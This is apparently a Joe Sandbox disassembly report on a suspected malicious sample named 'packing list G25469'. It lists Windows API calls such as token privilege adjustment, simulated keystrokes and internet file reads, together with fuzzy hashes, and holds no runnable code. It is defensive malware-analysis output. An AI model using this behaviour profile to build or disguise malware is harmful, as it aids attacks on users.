                                                  • Instruction ID: dc9eaaaf7d6cb6a51d09bc65815a03faf073008a7cb499a4ec59d0b03f454201
                                                  • Opcode Fuzzy Hash: 2f29054f6b59659d66271c81e1ed3a6d229e7392d17941f62f1f005527afc898
                                                  • Instruction Fuzzy Hash: 4141B270A00504AFDB10BF68CC82E7E77EDEF44724F14858CF956AB392DA749E019B91
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B7EB8A
                                                  • _wcscmp.LIBCMT ref: 00B7EBBA
                                                  • _wcscmp.LIBCMT ref: 00B7EBCF
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B7EBE0
                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00B7EC0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 2387731787-0
                                                  • Opcode ID: 44499df39c40bb915eee4fadfc14c535e2ebd15b9512d6844f26c00a2d633a27
                                                  • Instruction ID: fc054d183c868c6b896577eda61d7a6841653b73214db2848200d992c33c538f
                                                  • Opcode Fuzzy Hash: 44499df39c40bb915eee4fadfc14c535e2ebd15b9512d6844f26c00a2d633a27
                                                  • Instruction Fuzzy Hash: 28418E756046029FC708DF28C4D1AA9B7E4FF49324F1085DDF96A8B3A1DB71E944CB91
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: 87bc38ee75161573a22e06d26db9ae4758a73bf0bae26089d684777b91f19d56
                                                  • Instruction ID: 656fdf523e63b84b013b5258d9e987fb2dedfd98e78bcf092cb4c479fcf4e8bc
                                                  • Opcode Fuzzy Hash: 87bc38ee75161573a22e06d26db9ae4758a73bf0bae26089d684777b91f19d56
                                                  • Instruction Fuzzy Hash: AA11B2317001216FEB211F2ADC84A6FBBD8EF59760B0444A9F84AE7241DF74A90286A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                  • API String ID: 0-1546025612
                                                  • Opcode ID: 2ee612b8185231cfdacf54b0cb3278da908e7d358046b7ca27a665b789d6caf5
                                                  • Instruction ID: f69c68ffa85e2d15571ca78603b39e6d6d9cc7635add07ed5f9bf5ac06a350c8
                                                  • Opcode Fuzzy Hash: 2ee612b8185231cfdacf54b0cb3278da908e7d358046b7ca27a665b789d6caf5
                                                  • Instruction Fuzzy Hash: 92924B71A0021ACBDF24CF58C8907FDB7F1EB54314F2485EAE856AB280D7B5AD85CB91
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00B4E014,75920AE0,00B4DEF1,00BCDC38,?,?), ref: 00B4E02C
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B4E03E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 2574300362-192647395
                                                  • Opcode ID: 31fc64042e92a53870a2ba85ca147f064389bdc37db64922b13fc5ecb3e9caf7
                                                  • Instruction ID: ab3e7d7051fe2198e1535854e2acb73f64b361d0ba851519c05c8ef98a8cbfe3
                                                  • Opcode Fuzzy Hash: 31fc64042e92a53870a2ba85ca147f064389bdc37db64922b13fc5ecb3e9caf7
                                                  • Instruction Fuzzy Hash: A7D0A7305007329FC7314F65EC0971276DCFF04300F1844A9E4A2E3260EFF8C8808660
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B713DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: ($|
                                                  • API String ID: 1659193697-1631851259
                                                  • Opcode ID: 0d618dd9c80bb0f3875a4bd9bd907fad79481bb6a5133265e31beb159b693798
                                                  • Instruction ID: 2613139684389d3c4a06c3f4ea6b43490b779eeadf1aaa7a7f15c88d987071cc
                                                  • Opcode Fuzzy Hash: 0d618dd9c80bb0f3875a4bd9bd907fad79481bb6a5133265e31beb159b693798
                                                  • Instruction Fuzzy Hash: 1E321575A006059FC728CF6DC48096AB7F1FF48310B15C9AEE5AADB3A1E770E941CB54
                                                  APIs
                                                    • Part of subcall function 00B4B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B4B35F
                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B4B22F
                                                    • Part of subcall function 00B4B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B4B5A5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Proc$LongWindow
                                                  • String ID:
                                                  • API String ID: 2749884682-0
                                                  • Opcode ID: 3174cc9c2a66c405bc5176570c1bd4aabfefcae225dc3f96683b65407feda376
                                                  • Instruction ID: 7da05cd9153250ae4b02be89ccd038c6d64af28be2b0f61d64f00a397b2e27c5
                                                  • Opcode Fuzzy Hash: 3174cc9c2a66c405bc5176570c1bd4aabfefcae225dc3f96683b65407feda376
                                                  • Instruction Fuzzy Hash: 7BA14460118116BADF2CAF2A5CC8E7F2DECEB56350B1045E9F602E6291DF65DE00F272
                                                  APIs
                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B843BF,00000000), ref: 00B84FA6
                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B84FD2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                  • String ID:
                                                  • API String ID: 599397726-0
                                                  • Opcode ID: c1a9084dfea24451277147ece8f8383b7484e6d98cb31f3b43d31965550cabca
                                                  • Instruction ID: 0b02493e768e59ed0d042ec39aae32dc3ce5994a8b80f4602c3e8991333ec632
                                                  • Opcode Fuzzy Hash: c1a9084dfea24451277147ece8f8383b7484e6d98cb31f3b43d31965550cabca
                                                  • Instruction Fuzzy Hash: 1541C47150460ABFEB21AE84CC85EBF77ECEB40754F1040EEF605A61A1EBB19E41D7A0
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B7E20D
                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B7E267
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B7E2B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DiskFreeSpace
                                                  • String ID:
                                                  • API String ID: 1682464887-0
                                                  • Opcode ID: 3907ae1e18b7b7e11f39c6e50b910f9944eebf251fd330b9c7971e35b00bbcdf
                                                  • Instruction ID: a8e440871735996a3c263e84af12392c9d9b56f1c502dce46edce403a1053807
                                                  • Opcode Fuzzy Hash: 3907ae1e18b7b7e11f39c6e50b910f9944eebf251fd330b9c7971e35b00bbcdf
                                                  • Instruction Fuzzy Hash: E8213A75A00218EFCB00EFA9D8C5AADFBF8FF48310F1484A9E905AB252DB35D905CB50
                                                  APIs
                                                    • Part of subcall function 00B4F4EA: std::exception::exception.LIBCMT ref: 00B4F51E
                                                    • Part of subcall function 00B4F4EA: __CxxThrowException@8.LIBCMT ref: 00B4F533
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B6B180
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B6B1AD
                                                  • GetLastError.KERNEL32 ref: 00B6B1BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1922334811-0
                                                  • Opcode ID: 954211d6a493c23740cc5d1a69b9026b035f8dde839e158f46fc79f52c1e59c8
                                                  • Instruction ID: 0d3100ad67b0c0b03e6186b892a27dd71008d1bfdd36369e1c0df1bb1b28dcd8
                                                  • Opcode Fuzzy Hash: 954211d6a493c23740cc5d1a69b9026b035f8dde839e158f46fc79f52c1e59c8
                                                  • Instruction Fuzzy Hash: 8D11BCB2414205BFE718AF64DCD6D2BB7FDEF44310B20856EE056A3240EBB4FD418A60
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B766AF
                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00B766EC
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B766F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                  • String ID:
                                                  • API String ID: 33631002-0
                                                  • Opcode ID: d97f8f5b4661cd5b7dd7ad10e36d7e714ec084b26febb9d480002f8d7d5cf07d
                                                  • Instruction ID: 2465ea282559052a68025e95d1c64593aa2561a75492552372aebfcec4dbadb5
                                                  • Opcode Fuzzy Hash: d97f8f5b4661cd5b7dd7ad10e36d7e714ec084b26febb9d480002f8d7d5cf07d
                                                  • Instruction Fuzzy Hash: 1E1182B1901228BFE7108BA8DC45FAFB7ECEB04754F004656F915E7191D2B89E0487A5
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B77223
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B7723A
                                                  • FreeSid.ADVAPI32(?), ref: 00B7724A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: 732d60bd0ec9ce7645fa40c4ea0d9fdcd7b881f5bb73d122b5e309060574aba6
                                                  • Instruction ID: 31a9160e0ee43a8f12e251baddaeda36962aa0c882516587431179b11540c02f
                                                  • Opcode Fuzzy Hash: 732d60bd0ec9ce7645fa40c4ea0d9fdcd7b881f5bb73d122b5e309060574aba6
                                                  • Instruction Fuzzy Hash: 50F01D76A44209BFDF04DFE4DD99AEEBBB8EF08301F5045A9A602E3191E6749A448B10
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B7F599
                                                  • FindClose.KERNEL32(00000000), ref: 00B7F5C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 435633e1cc7d2f4b3554f9fc27ed46d69a45a71285e2ff9fdd1cc4c7b2b06f4e
                                                  • Instruction ID: a6cc2b8115bbb5da020613016edc1f18bb101f32bc315f281c107938dd1eb2ee
                                                  • Opcode Fuzzy Hash: 435633e1cc7d2f4b3554f9fc27ed46d69a45a71285e2ff9fdd1cc4c7b2b06f4e
                                                  • Instruction Fuzzy Hash: E91184716006019FD710EF28D885A2EB7E9FF94324F00895EF8A9DB291DF74AD058B95
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B8BE6A,?,?,00000000,?), ref: 00B7CEA7
                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B8BE6A,?,?,00000000,?), ref: 00B7CEB9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: 208f20e8b5853ee74ea1b20a1b95736a5cace7d0f5e26cf86432f3cc722ab802
                                                  • Instruction ID: 02898066cf9f8f1d9d88f8d380200411ce3471b340ead72dc44112148168200d
                                                  • Opcode Fuzzy Hash: 208f20e8b5853ee74ea1b20a1b95736a5cace7d0f5e26cf86432f3cc722ab802
                                                  • Instruction Fuzzy Hash: 2FF08231100229EBDB109FA4DC49FEA77ADFF08361F0082A9F919D7181D670AA44CBA0
                                                  APIs
                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B74153
                                                  • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00B74166
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: InputSendkeybd_event
                                                  • String ID:
                                                  • API String ID: 3536248340-0
                                                  • Opcode ID: 8cc4195be8f0475492f76623a3c47defc6cc4a329a88a3ee717eebeb25bcad58
                                                  • Instruction ID: e7dc9443ae30365385525b0a2067cb2841a6a8484dbd2d49f235390f667758db
                                                  • Opcode Fuzzy Hash: 8cc4195be8f0475492f76623a3c47defc6cc4a329a88a3ee717eebeb25bcad58
                                                  • Instruction Fuzzy Hash: 52F0907080034DAFDB059FA0C805BBE7FB0EF10305F008049F966A6191D7B9C612DFA0
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B6ACC0), ref: 00B6AB99
                                                  • CloseHandle.KERNEL32(?,?,00B6ACC0), ref: 00B6ABAB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: 38893b9b05a076c2fe6ec6c5c3b89818d6d3c820548d0aa92ed6f0f48046c5ed
                                                  • Instruction ID: 88937b5604f78a13b93e113705b8b510d1f71b510b73c8320d2e67e8cb424dad
                                                  • Opcode Fuzzy Hash: 38893b9b05a076c2fe6ec6c5c3b89818d6d3c820548d0aa92ed6f0f48046c5ed
                                                  • Instruction Fuzzy Hash: 8DE08631000511AFE7252F14EC04D7777E9EF043207108969F45982430DB625D90DB50
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00B56DB3,-0000031A,?,?,00000001), ref: 00B581B1
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B581BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: ace74aaa9e5e3cc9237649b68ae9e1767fafbf8710009c70b50a84ef7c9a7a0e
                                                  • Instruction ID: df5dd11fcf4007ba462b125c4c1dc6fd502b1ab831a3bc4cc84e584ac213915d
                                                  • Opcode Fuzzy Hash: ace74aaa9e5e3cc9237649b68ae9e1767fafbf8710009c70b50a84ef7c9a7a0e
                                                  • Instruction Fuzzy Hash: 75B09231144608ABDB002BA1EC09B587FA8EB08652F044120F60D46062AFB754108B9A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 4cb560aaaef9a86795b055dccbd0404bbeea1d03756c4d4047f7b9994d58c75d
                                                  • Instruction ID: 3c9e1b4ca5f7bfa0f704597d3f613915e5914ca8d32e8150bacffc6dba267f63
                                                  • Opcode Fuzzy Hash: 4cb560aaaef9a86795b055dccbd0404bbeea1d03756c4d4047f7b9994d58c75d
                                                  • Instruction Fuzzy Hash: 28A23AB4A04219DFDB24CF58C4906EDBBF1FF49314F2581A9E859AB390DB709E81DB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
